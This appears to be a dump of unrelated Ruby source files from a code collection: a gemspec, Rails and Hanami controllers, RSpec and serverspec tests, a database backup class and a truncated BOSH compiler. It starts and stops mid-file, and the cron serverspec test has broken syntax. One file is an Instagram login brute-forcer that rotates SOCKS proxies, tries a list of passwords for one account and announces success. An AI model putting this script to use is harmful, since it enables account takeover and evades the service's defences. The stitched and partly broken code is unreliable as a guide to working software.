params.require(:user).permit(:id)
end
end | 14.944444 | 45 | 0.687732 |
7acda88db5998f11d0658e2fd8541425e9b0ca46 | 2,290 | # -*- encoding: utf-8 -*-
# stub: http_parser.rb 0.6.0 ruby lib
# stub: ext/ruby_http_parser/extconf.rb
Gem::Specification.new do |s|
s.name = "http_parser.rb".freeze
s.version = "0.6.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Marc-Andre Cournoyer".freeze, "Aman Gupta".freeze]
s.date = "2013-12-11"
s.description = "Ruby bindings to http://github.com/ry/http-parser and http://github.com/a2800276/http-parser.java".freeze
s.email = ["[email protected]".freeze, "[email protected]".freeze]
s.extensions = ["ext/ruby_http_parser/extconf.rb".freeze]
s.files = ["ext/ruby_http_parser/extconf.rb".freeze]
s.homepage = "http://github.com/tmm1/http_parser.rb".freeze
s.licenses = ["MIT".freeze]
s.rubygems_version = "3.0.1".freeze
s.summary = "Simple callback-based HTTP request/response parser".freeze
s.installed_by_version = "3.0.1" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_development_dependency(%q<rake-compiler>.freeze, [">= 0.7.9"])
s.add_development_dependency(%q<rspec>.freeze, [">= 2.0.1"])
s.add_development_dependency(%q<json>.freeze, [">= 1.4.6"])
s.add_development_dependency(%q<benchmark_suite>.freeze, [">= 0"])
s.add_development_dependency(%q<ffi>.freeze, [">= 0"])
s.add_development_dependency(%q<yajl-ruby>.freeze, [">= 0.8.1"])
else
s.add_dependency(%q<rake-compiler>.freeze, [">= 0.7.9"])
s.add_dependency(%q<rspec>.freeze, [">= 2.0.1"])
s.add_dependency(%q<json>.freeze, [">= 1.4.6"])
s.add_dependency(%q<benchmark_suite>.freeze, [">= 0"])
s.add_dependency(%q<ffi>.freeze, [">= 0"])
s.add_dependency(%q<yajl-ruby>.freeze, [">= 0.8.1"])
end
else
s.add_dependency(%q<rake-compiler>.freeze, [">= 0.7.9"])
s.add_dependency(%q<rspec>.freeze, [">= 2.0.1"])
s.add_dependency(%q<json>.freeze, [">= 1.4.6"])
s.add_dependency(%q<benchmark_suite>.freeze, [">= 0"])
s.add_dependency(%q<ffi>.freeze, [">= 0"])
s.add_dependency(%q<yajl-ruby>.freeze, [">= 0.8.1"])
end
end
| 44.901961 | 124 | 0.657205 |
e943bb53fa5b7eeb02a62b5270c05d907e2735b3 | 48 | module Octicons
VERSION = "15.0.1".freeze
end
| 12 | 27 | 0.708333 |
03cc27c31c7b85dcbedacc313028d6ff00cfa411 | 791 | require 'watir'
require_relative 'creds'
require_relative 'prox'
username = $username
counter=0
loop do
$password.each { |val|
# Open Browser, Navigate to Login page
browser = Watir::Browser.new :chrome, :switches => ['--proxy-server=socks5://'+"#{$proxy[counter]}"]
browser.goto "instagram.com/accounts/login/"
puts "#{$proxy[counter]}"
# Navigate to Username and Password fields, inject info
puts "Logging in..."
browser.text_field(:name => "username").set "#{username}"
browser.text_field(:name => "password").set "#{val}"
browser.button(:class => '_0mzm- sqdOP L3NKy').click
sleep(5)
counter= counter+1
if browser.button(:class => '_0mzm- sqdOP L3NKy').exists?
browser.close
else
print "\a"
puts "We're in #hackerman"
end
}
end
| 25.516129 | 102 | 0.663717 |
e9ad04d01f4e77df4832e3a392d69d0bcd373588 | 166 | module Web::Controllers::Books
class Index
include Web::Action
expose :books
def call(params)
@books = BookRepository.new.all
end
end
end
| 13.833333 | 37 | 0.656627 |
38a49e8f60b3f9dc2d0cd8a287ea48972db04bd0 | 1,642 | require 'spec_helper'
require_relative '../../../app/models/visualization/name_checker'
include CartoDB
describe Visualization::NameChecker do
before :all do
bypass_named_maps
@user = create(:valid_user)
@user2 = create(:valid_user)
@vis1 = build(:derived_visualization, name: 'Visualization 1', user_id: @user.id).store
@vis2 = build(:derived_visualization, name: 'Visualization 2', user_id: @user.id).store
@vis3 = build(:derived_visualization, name: 'Visualization 4', user_id: @user2.id).store
@shared_entity = Carto::SharedEntity.create(
recipient_id: @user.id,
recipient_type: Carto::SharedEntity::RECIPIENT_TYPE_USER,
entity_id: @vis3.id,
entity_type: Carto::SharedEntity::ENTITY_TYPE_VISUALIZATION
)
end
after :all do
@shared_entity.destroy
@vis3.destroy
@vis2.destroy
@vis1.destroy
@user.destroy
end
describe '#available?' do
it 'returns true if passed visualization name is available for the user' do
checker = Visualization::NameChecker.new(@user)
checker.available?('Visualization 3').should == true
end
it 'returns false if passed visualization name is in use by the user' do
checker = Visualization::NameChecker.new(@user)
checker.available?('Visualization 1').should == false
checker.available?('Visualization 2').should == false
end
it 'returns true if name is available but used in shared visualizations' do
checker = Visualization::NameChecker.new(@user)
checker.available?('Visualization 4').should == true
end
end # available?
end # Visualization::NameChecker
| 32.84 | 92 | 0.705238 |
e98703a1f874a415d49028239401a66968e1ff44 | 1,818 | module QuestionsHelper
def questions_index_links(questions)
links = []
# links for form mode
if params[:controller] == 'forms'
# add the 'add questions to form' link if there are some questions
unless @questions.empty?
links << batch_op_link(:name => t("form.add_selected"), :path => add_questions_form_path(@form))
end
# add the create new questions link
links << create_link(Question, :js => true) if can?(:create, Question)
# otherwise, we're in regular questions mode
else
# add the create new question
links << create_link(Question) if can?(:create, Question)
add_import_standard_link_if_appropriate(links)
end
# return the link set
links
end
def questions_index_fields
fields = %w(std_icon code name type form_count answer_count published)
# dont add the actions column if we're not in the forms controller, since that means we're probably in form#choose_questions
fields << 'actions' unless params[:controller] == 'forms'
fields
end
def format_questions_field(q, field)
case field
when "std_icon" then std_icon(q)
when "type" then t(q.qtype_name, :scope => :question_type)
when "published" then tbool(q.published?)
when "answer_count" then number_with_delimiter(q.answer_count)
when "actions" then table_action_links(q)
when "name"
params[:controller] == 'forms' ? q.name : link_to(q.name, q)
else q.send(field)
end
end
# Builds option tags for the given option sets. Adds multilevel data attrib.
def option_set_select_option_tags(sets, selected_id)
sets.map do |s|
content_tag(:option, s.name, value: s.id, selected: s.id == selected_id ? 'selected' : nil, :'data-multilevel' => s.multi_level?)
end.join.html_safe
end
end
| 32.464286 | 135 | 0.687569 |
21537d8173252d58cd9b1b322006f737cc07ce5e | 2,857 | require 'rails_helper'
RSpec.describe Voucher, type: :model do
fixtures :all
describe "relationships" do
it "should have an associated MASA" do
v1 = vouchers(:voucher1)
expect(v1.manufacturer).to be_present
end
it "should have an associated MASA" do
v1 = vouchers(:voucher1)
expect(v1.voucher_request).to be_present
end
end
describe "receiving" do
it "should raise an exception when reading a voucher without public key" do
voucher_binary=IO::read(File.join("spec","files","voucher_jada123456789_bad.vch"))
expect {
v1 = CoseVoucher.from_voucher(nil, :cose, voucher_binary)
}.to raise_error(Chariwt::Voucher::MissingPublicKey)
end
it "should create voucher object and place the signed data in it" do
voucher_base64 = IO::read(File.join("spec","files","voucher_JADA_f2-00-01.pkcs"))
voucher_binary = Base64.decode64(voucher_base64)
v1 = CmsVoucher.from_voucher(nil, :pkcs7, voucher_binary, nil)
expect(v1.device).to eq(devices(:jadaf20001))
expect(v1).to_not be_proximity
end
it "should find a constrained voucher in the specification" do
cv2 = vouchers(:cv2)
expect(cv2.device).to eq(devices(:jadaf20002))
end
it "should load a constrained voucher representation, and create a database object for it" do
voucher_binary = IO::read(File.join("spec","files","voucher_00-D0-E5-F2-00-02.vch"))
masa_pubkey = IO::read(File.join("spec","files", ""))
v1 = CoseVoucher.from_voucher(nil, :cose, voucher_binary, nil)
expect(v1.device).to eq(devices(:f20))
end
it "should get a voucher format error on empty voucher object" do
voucher_base64 = IO::read(File.join("spec","files","voucher_EMPTY.pkcs"))
voucher_binary = Base64.decode64(voucher_base64)
expect {
v1 = Voucher.from_voucher(nil, :pkcs7, voucher_binary, nil)
}.to raise_exception(Voucher::VoucherFormatError)
end
it "should process a multipart voucher response into two parts" do
voucher_mime = Mail.read(File.join("spec","files","voucher_00-D0-E5-F2-00-03.mvch"))
expect(voucher_mime).to_not be_nil
expect(voucher_mime.parts[0]).to_not be_nil
expect(voucher_mime.parts[0].content_type).to eq("application/voucher-cose+cbor")
expect(voucher_mime.parts[1]).to_not be_nil
expect(voucher_mime.parts[1].content_type).to eq("application/pkcs7-mime; smime-type=certs-only")
end
it "should process a multipart voucher response into a validated voucher" do
input_voucher = IO::binread(File.join("spec","files","voucher_00-D0-E5-F2-00-03.mvch"))
v1 = Voucher.from_multipart(nil, :cbor, input_voucher)
expect(v1).to_not be_nil
expect(v1.type).to eq("CoseVoucher")
expect(v1).to be_valid
end
end
end
| 34.421687 | 103 | 0.690935 |
ed598c3e735a69207ca6143fec4b93abc01a7595 | 2,552 | require 'spec_helper_acceptance'
# Enable Cron Daemon - Section 5.1.1
describe service('crond') do
it { is_expected.to be_running }
end
# Ensure permissions on /etc/crontab are configured - Section 5.1.2
describe file('/etc/crontab') do
it { is_expected.to be_file }
it { is_expected.to be_owned_by 'root' }
it { is_expected.to be_grouped_into 'root' }
it { is_expected.to be_mode 644
end
# Ensure permissions on /etc/cron.hourly are configured - Section 5.1.3
describe file('/etc/cron.hourly') do
it { is_expected.to be_directory }
it { is_expected.to be_owned_by 'root' }
it { is_expected.to be_grouped_into 'root' }
it { is_expected.to be_mode 700 }
end
# Ensure permissions on /etc/cron.daily are configured - Section 5.1.4
describe file('/etc/cron.daily') do
it { is_expected.to be_directory }
it { is_expected.to be_owned_by 'root'
is_expected.to be_grouped_into 'root'
is_expected.to be_mode 700
end
end
# Ensure permissions on /etc/cron.weekly are configured - Section 5.1.5
describe file('/etc/cron.weekly') do
it do
is_expected.to be_directory
is_expected.to be_owned_by 'root'
is_expected.to be_grouped_into 'root'
is_expected.to be_mode 700
end
end
# Ensure permissions on /etc/cron.monthly are configured - Section 5.1.6
describe file('/etc/cron.monthly') do
it do
is_expected.to be_directory
is_expected.to be_owned_by 'root'
is_expected.to be_grouped_into 'root'
is_expected.to be_mode 700
end
end
# Ensure permissions on /etc/cron.d are configured - Section 5.1.7
describe file('/etc/cron.monthly') do
it do
is_expected.to be_directory
is_expected.to be_owned_by 'root'
is_expected.to be_grouped_into 'root'
is_expected.to be_mode 700
end
end
# Ensure at/cron is restricted to authorized users - Section 5.1.8
describe file('/etc/at.deny') do
it do
is_expected.not_to be_file
end
end
describe file('/etc/cron.deny') do
it do
is_expected.not_to be_file
end
end
describe file('/etc/cron.allow') do
it do
is_expected.to be_file
is_expected.to be_owned_by 'root'
is_expected.to be_grouped_into 'root'
is_expected.to be_mode 600
end
end
describe file('/etc/at.allow') do
it do
is_expected.to be_file
is_expected.to be_owned_by 'root'
is_expected.to be_grouped_into 'root'
is_expected.to be_mode 600
end
end
| 27.44086 | 74 | 0.679859 |
33d6073a892c47bbaf3bb2099518d1e528e70998 | 265 | name "openopps"
description "Open Opportunities configuration & customizations on Midas for AWS"
run_list "midas"
override_attributes(
midas: {
config_repo: "https://github.com/18F/midas-open-opportunities.git",
config_name: "open-opportunities",
}
)
| 22.083333 | 80 | 0.74717 |
e908d23ee8eb230f50a9969ebb1d351f0ffbb5d6 | 380 | require "domainotron/version"
module Domainotron
def self.get_domain(url, remove_www: true)
normalized = url.sub(/:\d+{2,6}/, '').sub(/\/\Z/, '')
unless url.match /^(http:\/\/|https:\/\/|\/\/)/
normalized = '//' + normalized
end
domain = URI.parse(normalized).host
if remove_www
domain = domain.gsub('www.', '')
end
domain
end
end
| 19 | 57 | 0.576316 |
6298a74d9920d5fd0e9d962b405e0bfc3486ee89 | 564 | require 'rails_helper'
RSpec.describe DashboardController, type: :controller do
it 'inherits from ProtectedController' do
expect(subject).to be_a_kind_of(ProtectedController)
end
let(:user_client) { FactoryGirl.create(:user_client) }
before(:example) { sign_in user_client }
describe "GET index" do
it "returns http success" do
get :index
expect(response).to have_http_status(:success)
end
it "returns html content type" do
get :index
expect(response.content_type).to eq(Mime::HTML.to_s)
end
end
end
| 20.888889 | 58 | 0.707447 |
3871d939feb62c16ebfaef7d32c06aef82524a2a | 1,517 | require 'spec_helper'
describe Gitlab::Ci::Config do
let(:config) do
described_class.new(yml)
end
context 'when config is valid' do
let(:yml) do
<<-EOS
image: ruby:2.2
rspec:
script:
- gem install rspec
- rspec
EOS
end
describe '#to_hash' do
it 'returns hash created from string' do
hash = {
image: 'ruby:2.2',
rspec: {
script: ['gem install rspec',
'rspec']
}
}
expect(config.to_hash).to eq hash
end
describe '#valid?' do
it 'is valid' do
expect(config).to be_valid
end
it 'has no errors' do
expect(config.errors).to be_empty
end
end
end
context 'when config is invalid' do
context 'when yml is incorrect' do
let(:yml) { '// invalid' }
describe '.new' do
it 'raises error' do
expect { config }.to raise_error(
Gitlab::Ci::Config::Loader::FormatError,
/Invalid configuration format/
)
end
end
end
context 'when config logic is incorrect' do
let(:yml) { 'before_script: "ls"' }
describe '#valid?' do
it 'is not valid' do
expect(config).not_to be_valid
end
it 'has errors' do
expect(config.errors).not_to be_empty
end
end
end
end
end
end
| 20.5 | 54 | 0.497034 |
28e34706975e698eb65260feacc171ad7e8ba9e1 | 3,069 | class DatabaseBackup
BACKUP_DIR = 'db/backups'
module Frequency
DAILY = :daily
HOURLY = :hourly
end
attr_accessor :max_num_of_backups
def initialize(database_backup_adapter, max_num_of_backups: 10)
@database_backup_adapter = database_backup_adapter
@max_num_of_backups = max_num_of_backups
@rotate_frequency = nil
end
def create
FileUtils.mkdir_p backup_path
@latest_backup_file = create_backup
remove_symlink_to_old_backup
create_symlink_to_new_backup
delete_oldest_backup
compress_old_backups
@latest_backup_file
end
def create_rotated(frequency)
@rotate_frequency = frequency
create
cleanup
end
def restore(path)
@database_backup_adapter.restore path
end
def restore_most_recent
@database_backup_adapter.restore symlink_file
end
def symlink_file
File.join backup_path, 'latest.dump'
end
def backups
Dir.glob(File.join(backup_path, '*'))
end
def cleanup
# hourly - keep for 24 hours
sh "find #{storage_path}/backup.hourly/ -mmin +1440 -exec rm -rv {} \\;"
# daily - keep for 14 days
sh "find #{storage_path}/backup.daily/ -mtime +14 -exec rm -rv {} \\;"
# weekly - keep for 60 days
sh "find #{storage_path}/backup.weekly/ -mtime +60 -exec rm -rv {} \\;"
# monthly - keep for 300 days
sh "find #{storage_path}/backup.monthly/ -mtime +300 -exec rm -rv {} \\;"
end
private
# Procedural Methods
def create_backup
backup_filename = "#{Time.now.strftime('%Y%m%d%H%M%S')}.dump"
latest_backup_file = File.join backup_path, backup_filename
@database_backup_adapter.create_backup latest_backup_file
latest_backup_file
end
def remove_symlink_to_old_backup
File.delete(symlink_file) if File.exist?(symlink_file)
end
def create_symlink_to_new_backup
sh "ln -sf #{@latest_backup_file} #{symlink_file}"
end
def delete_oldest_backup
File.delete(old_backups.first) if old_backups.count >= max_num_of_backups
end
def compress_old_backups
old_backups.each do |backup_filename|
next if backup_filename =~ /.dump.gz/
sh "gzip #{backup_filename}"
end
end
# Helper Methods
def root_dir
Rails.root
end
def backup_path
if @rotate_frequency
rotated_backup_path(@rotate_frequency)
else
storage_path
end
end
def storage_path
File.join(root_dir, BACKUP_DIR)
end
def rotated_backup_path(frequency = Frequency::DAILY)
storage = File.join(root_dir, BACKUP_DIR)
now = Time.now
if now.day == 1
storage = File.join(storage, 'backup.monthly')
elsif now.wday == 0
storage = File.join(storage, 'backup.weekly')
elsif frequency == Frequency::DAILY || now.hour == 0
storage = File.join(storage, 'backup.daily')
elsif frequency == Frequency::HOURLY
storage = File.join(storage, 'backup.hourly')
end
storage
end
def old_backups
backups.sort.reject { |r|
r == @latest_backup_file || r == symlink_file
}
end
def sh(cmd)
`#{cmd}`
end
end
| 23.427481 | 77 | 0.69306 |
6a12c6f988b900384fc14c5f5be702486f0b5dab | 340 | #
# Cookbook:: accesos
# Recipe:: panidiroftp
#
# Copyright:: 2018, The Authors, All Rights Reserved.
#
node.default['openssh']['server']['permit_root_login'] = "no"
node.default['openssh']['server']['password_authentication'] = "yes"
node.default['openssh']['server']['allow_groups'] = "linux_admin panidiroftp"
#
include_recipe 'openssh'
| 28.333333 | 77 | 0.717647 |
39f381423ebe4e7901097e16909431d2f3bfb26c | 534 | cask 'boxer' do
version '1.4.0'
sha256 'a75f9149612f90fa78f1016a6edef34ed600334f7170d624b083a310ae4c904e'
# github.com/alunbestor/Boxer was verified as official when first introduced to the cask
url "https://github.com/alunbestor/Boxer/releases/download/v#{version}/boxer-#{version}.zip"
appcast 'http://boxerapp.com/appcast',
checkpoint: 'a8d19705429ced354ead57abc45060f504368fd7def6038fb2f54e77a8a22c21'
name 'Boxer'
homepage 'http://boxerapp.com/'
depends_on macos: '>= :leopard'
app 'Boxer.app'
end
| 33.375 | 94 | 0.7603 |
33b2eb28ee2684ae8f52a9e27c450b0b4b8c4e4f | 640 | Rails.application.routes.draw do
devise_for :users
resources :facilities
# For details on the DSL available within this file, see http://guides.rubyonrails.org/routing.html
post '/file_uploads', to: 'file_uploads#upload'
resources :file_uploads, only: [:index, :new]
get '/file_uploads/:id', to: 'file_uploads#show', as: 'show_processed_file'
get 'reports', action: 'index', controller: 'reports'
get 'reports/lengths/:processed_file_id', action: 'lengths_for_measurement', controller: 'reports'
get 'home', action: 'index', controller: 'home'
get 'about', action: 'show', controller: 'home'
root 'home#index'
end
| 35.555556 | 101 | 0.725 |
38d5044c58755debe348400cbd16b7180a89845f | 356 | class CreateInvitations < ActiveRecord::Migration[6.0]
def change
create_table :invitations do |t|
t.integer :user_id
t.integer :event_id
t.boolean :attending, default: false
t.timestamps
end
add_foreign_key :invitations, :events, column: :event_id
add_foreign_key :invitations, :users, column: :user_id
end
end
| 27.384615 | 60 | 0.702247 |
26c34b3f125c27b55f931c74af91fc30435577f9 | 1,094 | module Importer
# Import a csv file with one work per row. The first row of the csv should be a
# header row. The model for each row can either be specified in a column called
# 'type' or globally by passing the model attribute
class CSVImporter
def initialize(metadata_file, files_directory, model = nil)
@model = model
@files_directory = files_directory
@metadata_file = metadata_file
end
def import_all
count = 0
parser.each do |attributes|
create_fedora_objects(attributes)
count += 1
end
count
end
private
def parser
CSVParser.new(@metadata_file)
end
# Build a factory to create the objects in fedora.
def create_fedora_objects(attributes)
model = attributes.delete(:type) || @model.to_s
if model.empty?
$stderr.puts 'ERROR: No model was specified'
# rubocop:disable Rails/Exit
exit(1)
# rubocop:enable Rails/Exit
end
Factory.for(model).new(attributes, @files_directory).run
end
end
end
| 27.35 | 81 | 0.642596 |
1a31e3e37bd2030378e3c5f45b22f09ed22f701f | 521 | require "sentry/rails/tracing/abstract_subscriber"
module Sentry
module Rails
module Tracing
class ActionViewSubscriber < AbstractSubscriber
EVENT_NAME = "render_template.action_view".freeze
def self.subscribe!
subscribe_to_event(EVENT_NAME) do |event_name, duration, payload|
record_on_current_span(op: event_name, start_timestamp: payload[:start_timestamp], description: payload[:identifier], duration: duration)
end
end
end
end
end
end
| 28.944444 | 149 | 0.708253 |
5d6ea812be98fb1b97a0a593a5d02c76fd7034fc | 5,689 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'GitLab GraphQL API User Enumeration',
'Description' => %q{
This module queries the GitLab GraphQL API without authentication
to acquire the list of GitLab users (CVE-2021-4191). The module works
on all GitLab versions from 13.0 up to 14.8.2, 14.7.4, and 14.6.5.
},
'License' => MSF_LICENSE,
'Author' => [
'jbaines-r7', # Independent discovery and Metasploit module
'mungsul' # Independent discovery
],
'References' => [
[ 'CVE', '2021-4191' ],
[ 'URL', 'https://about.gitlab.com/releases/2022/02/25/critical-security-release-gitlab-14-8-2-released/#unauthenticated-user-enumeration-on-graphql-api'],
[ 'URL', 'https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/']
],
'DisclosureDate' => '2022-02-25',
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => []
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
##
# Send the GraphQL query to the /api/graphql endpoint. Despite being able to
# extract significantly more information, this request will only request
# usernames. The function will do some verification to ensure the received
# payload is the expected JSON.
#
# @param after [String] The parameter is used for paging because GitLab will only
# return 100 results at a time. If no paging is needed this should be empty.
# @return [Hash] A Ruby Hash representation of the returned JSON data.
##
def do_request(after)
graphql_query = '{"query": "query { users'
unless after.empty?
graphql_query += "(after:\\\"#{after}\\\")"
end
graphql_query.concat(' { pageInfo { hasNextPage, hasPreviousPage, endCursor, startCursor }, nodes { username } } }" }')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/api/graphql'),
'ctype' => 'application/json',
'data' => graphql_query
})
fail_with(Failure::UnexpectedReply, "The target didn't respond with 200 OK") unless res&.code == 200
fail_with(Failure::UnexpectedReply, "The target didn't respond with an HTTP body") unless res.body
user_json = res.get_json_document
fail_with(Failure::UnexpectedReply, "The target didn't return a JSON body") if user_json.nil?
nodes = user_json.dig('data', 'users', 'nodes')
fail_with(Failure::UnexpectedReply, 'Could not find nodes in the JSON body') if nodes.nil?
user_json
end
##
# Parses the JSON data returned by the server. Adds the usernames to
# the users array and adds them, indirectly, to create_credential_login.
# This function also determines if we need to request more data from
# the server.
#
# @param user_json [Hash] The JSON data provided by the server
# @param users [Array] An array to store new usernames in
# @return [String] An empty string or the "endCursor" to use with do_request
##
def parse_json(user_json, users)
nodes = user_json.dig('data', 'users', 'nodes')
return '' if nodes.nil?
nodes.each do |node|
username = node['username']
store_username(username, node)
users.push(username)
end
query_paging_info = ''
more_data = user_json.dig('data', 'users', 'pageInfo', 'hasNextPage')
if !more_data.nil? && more_data == true
query_paging_info = user_json['data']['users']['pageInfo']['endCursor']
end
query_paging_info
end
def store_userlist(users, service)
loot = store_loot('gitlab.users', 'text/plain', rhost, users, nil, 'GitLab Users', service)
print_good("Userlist stored at #{loot}")
end
def store_username(username, json)
connection_details = {
module_fullname: fullname,
workspace_id: myworkspace_id,
username: username,
proof: json,
status: Metasploit::Model::Login::Status::UNTRIED
}.merge(service_details)
create_credential_and_login(connection_details)
end
##
# Send an initial GraphQL request to the server and keep sending
# requests until the server has no more data to give us.
##
def run_host(_ip)
user_json = do_request('')
service = report_service(
host: rhost,
port: rport,
name: (ssl ? 'https' : 'http'),
proto: 'tcp'
)
# parse the initial page
users = []
query_paging_info = parse_json(user_json, users)
# handle any follow on pages
request_count = 0
until query_paging_info.empty?
# periodically tell the user that we are still working. Start at 1 since one request already happened
request_count += 1
print_status("GraphQL API pagination request: #{request_count}") if request_count % 5 == 0
user_json = do_request(query_paging_info)
query_paging_info = parse_json(user_json, users)
end
if users.empty?
print_error('No GitLab users were enumerated.')
else
print_good("Enumerated #{users.length} GitLab users")
users_string = users.join("\n") + "\n"
store_userlist(users_string, service)
end
end
end
| 34.065868 | 165 | 0.652311 |
0864e7ef2af737f1d63b9ef3fd32aecfc7e4d50d | 4,525 | require 'active_support/core_ext/hash/keys'
require 'action_dispatch/middleware/session/abstract_store'
require 'rack/session/cookie'
module ActionDispatch
module Session
# This cookie-based session store is the Rails default. It is
# dramatically faster than the alternatives.
#
# Sessions typically contain at most a user_id and flash message; both fit
# within the 4K cookie size limit. A CookieOverflow exception is raised if
# you attempt to store more than 4K of data.
#
# The cookie jar used for storage is automatically configured to be the
# best possible option given your application's configuration.
#
# If you only have secret_token set, your cookies will be signed, but
# not encrypted. This means a user cannot alter their +user_id+ without
# knowing your app's secret key, but can easily read their +user_id+. This
# was the default for Rails 3 apps.
#
# If you have secret_key_base set, your cookies will be encrypted. This
# goes a step further than signed cookies in that encrypted cookies cannot
# be altered or read by users. This is the default starting in Rails 4.
#
# If you have both secret_token and secret_key base set, your cookies will
# be encrypted, and signed cookies generated by Rails 3 will be
# transparently read and encrypted to provide a smooth upgrade path.
#
# Configure your session store in config/initializers/session_store.rb:
#
# Rails.application.config.session_store :cookie_store, key: '_your_app_session'
#
# Configure your secret key in config/secrets.yml:
#
# development:
# secret_key_base: 'secret key'
#
# To generate a secret key for an existing application, run `rake secret`.
#
# If you are upgrading an existing Rails 3 app, you should leave your
# existing secret_token in place and simply add the new secret_key_base.
# Note that you should wait to set secret_key_base until you have 100% of
# your userbase on Rails 4 and are reasonably sure you will not need to
# rollback to Rails 3. This is because cookies signed based on the new
# secret_key_base in Rails 4 are not backwards compatible with Rails 3.
# You are free to leave your existing secret_token in place, not set the
# new secret_key_base, and ignore the deprecation warnings until you are
# reasonably sure that your upgrade is otherwise complete. Additionally,
# you should take care to make sure you are not relying on the ability to
# decode signed cookies generated by your app in external applications or
# Javascript before upgrading.
#
# Note that changing the secret key will invalidate all existing sessions!
class CookieStore < Rack::Session::Abstract::ID
include Compatibility
include StaleSessionCheck
include SessionObject
def initialize(app, options={})
super(app, options.merge!(:cookie_only => true))
end
def destroy_session(env, session_id, options)
new_sid = generate_sid unless options[:drop]
# Reset hash and Assign the new session id
env["action_dispatch.request.unsigned_session_cookie"] = new_sid ? { "session_id" => new_sid } : {}
new_sid
end
def load_session(env)
stale_session_check! do
data = unpacked_cookie_data(env)
data = persistent_session_id!(data)
[data["session_id"], data]
end
end
private
def extract_session_id(env)
stale_session_check! do
unpacked_cookie_data(env)["session_id"]
end
end
def unpacked_cookie_data(env)
env["action_dispatch.request.unsigned_session_cookie"] ||= begin
stale_session_check! do
if data = get_cookie(env)
data.stringify_keys!
end
data || {}
end
end
end
def persistent_session_id!(data, sid=nil)
data ||= {}
data["session_id"] ||= sid || generate_sid
data
end
def set_session(env, sid, session_data, options)
session_data["session_id"] = sid
session_data
end
def set_cookie(env, session_id, cookie)
cookie_jar(env)[@key] = cookie
end
def get_cookie(env)
cookie_jar(env)[@key]
end
def cookie_jar(env)
request = ActionDispatch::Request.new(env)
request.cookie_jar.signed_or_encrypted
end
end
end
end
| 36.491935 | 107 | 0.676906 |
03d1225767c1dc13c47535d1cd79e0db1a4eeba4 | 504 | # frozen_string_literal: true
require_relative '../options_helper'
describe OctocatalogDiff::CatalogDiff::Cli::Options do
describe '#opt_fact_override' do
include_examples 'global array option', 'fact-override', :fact_override_in
it 'should accept multiple facts of the same type' do
args = ['--to-fact-override', 'foo=bar', '--to-fact-override', 'baz=buzz']
result = run_optparse(args)
expect(result[:to_fact_override_in]).to eq(['foo=bar', 'baz=buzz'])
end
end
end
| 31.5 | 80 | 0.704365 |
38c4a834c57c0cf23e2e189d759de7e631d78536 | 1,039 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20170810023811) do
create_table "users", force: :cascade, options: "ENGINE=InnoDB DEFAULT CHARSET=utf8" do |t|
t.string "email"
t.string "password_digest"
t.string "role"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
end
| 43.291667 | 93 | 0.766121 |
2876aecb44c49b16e41348e2d5c87363c3ebbd2d | 336 | # -*- coding: utf-8 -*- #
# frozen_string_literal: true
describe Rouge::Lexers::Stan do
let(:subject) { Rouge::Lexers::Stan.new }
describe 'guessing' do
include Support::Guessing
it 'guesses by filename' do
assert_guess :filename => 'foo.stan'
assert_guess :filename => 'foo.stanfunctions'
end
end
end
| 19.764706 | 51 | 0.657738 |
21d83e36df91fa9fda87e2330a042530c3a9e5ed | 625 | module DataAbstraction::SensorData
class RainAccumlation < Generic
STANDARD_UNIT = "mm"
def initialize(data, meta_values = {}, unit = STANDARD_UNIT)
super(data, meta_values, unit)
@value = DimensionValue.new(data['value'].to_f, @unit)
@duration = DurationValue.new(data['duration'].to_f, data['duration_unit'] || "s");
end
def self.unit_class
DimensionValue
end
def self.standard_unit
STANDARD_UNIT
end
def to_hash
ret = super
ret['data']['duration'] = @duration.value
ret['data']['duration_unit'] = @duration.unit
ret
end
end
end
| 27.173913 | 89 | 0.6432 |
bf2299573825bdd58f601b9a8e75be5fc8bd6569 | 8,309 | module Bosh
module Release
class Compiler
include Bosh::Common::PropertyHelper
OPTIONS = {
"blobstore_options" => { "blobstore_path" => "/var/vcap/micro_bosh/data/cache" },
"blobstore_provider" => "local",
"base_dir" => "/var/vcap",
"platform_name" => "ubuntu",
"agent_uri" => "https://vcap:vcap@localhost:6969"
}
AGENT_START_RETRIES=16
def initialize(options)
@options = OPTIONS.merge(options)
@logger = Logger.new(@options["logfile"] || STDOUT)
FileUtils.mkdir_p(File.join(@options["base_dir"], "packages"))
bsc_provider = @options["blobstore_provider"]
bsc_options = @options["blobstore_options"]
@logger.info("Creating Blobstore client with #{bsc_provider} provider and options #{bsc_options}")
@blobstore_client = Bosh::Blobstore::Client.safe_create(bsc_provider, bsc_options)
end
def start
# Start the "compile" or "apply"
send(@options["command"].to_sym)
end
def apply_spec
File.join(@options["base_dir"], "micro/apply_spec.yml")
end
def connect_to_agent
num_tries = 0
begin
@agent = Bosh::Agent::Client.create(@options["agent_uri"], "user" => "vcap", "password" => "vcap")
@agent.ping
rescue => e
num_tries += 1
sleep 0.1
# Dont retry forever
retry if num_tries < AGENT_START_RETRIES
@logger.warn("Error connecting to agent #{e.inspect}")
raise
end
end
def compile
@logger.info("Compiling #{@options["manifest"]} with tarball #{@options["release"]}")
connect_to_agent
